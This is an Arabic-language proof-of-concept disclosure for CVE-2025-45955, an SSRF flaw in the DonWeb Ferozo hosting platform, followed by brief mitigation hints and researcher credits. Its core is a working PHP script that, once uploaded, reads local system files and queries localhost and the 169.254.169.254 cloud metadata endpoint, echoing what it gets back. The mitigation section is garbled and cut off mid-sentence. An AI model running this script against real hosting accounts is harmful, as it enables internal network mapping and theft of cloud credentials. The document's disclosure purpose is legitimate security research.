
إثبات المفهوم لثغرة CVE-2025-45955 التي توضح تزوير الطلب من جانب الخادم (SSRF) في منصة الاستضافة DonWeb Ferozo، مما يتيح رسم خرائط البنية التحتية الداخلية وتعداد البيانات الوصفية للسحابة.
يمكن للمهاجم استغلال هذه الثغرة عن طريق رفع وتنفيذ ملف PHP مصمم خصيصًا على منصة استضافة Ferozo. عند الوصول إليه، يقوم الملف بسلسلة من محاولات SSRF تستهدف الخدمات الداخلية (مثل 127.0.0.1 و 169.254.169.254 أو نقاط نهاية شبكة الخدمات)، والملفات المحلية (مثل file:///etc/passwd)، ونقاط نهاية البيانات الوصفية السحابية المعروفة. يقوم النص البرمجي بجمع الاستجابات أو رسائل الخطأ، مما يسمح للمهاجم برسم خريطة البنية التحتية الداخلية، وتعداد الخدمات التي يمكن الوصول إليها، وجمع المعلومات الحساسة لمزيد من الاستغلال.
الكود التالي يوضح الثغرة:
<?php
$targets = [
"file:///etc/hosts",
"file:///etc/resolv.conf",
"http://127.0.0.1/",
"http://169.254.169.254/latest/meta-data/"
];
foreach ($targets as $url) {
echo "[*] Trying: $url\n";
$res = @file_get_contents($url);
echo $res ? substr($res, 0, 500) : "Request failed or unreadable.\n";
}
?>
file_get_contents، fopen، إلخ)127.0.0.0/8، 169.254.169.254، إلخ) عبر قواعد جدار الحماية الصادرةCVE-2025-45955
أبلغ عن [Facundo Fernandez, Jinook Kim, Surendra Puppala / Security Researchers | @BYU]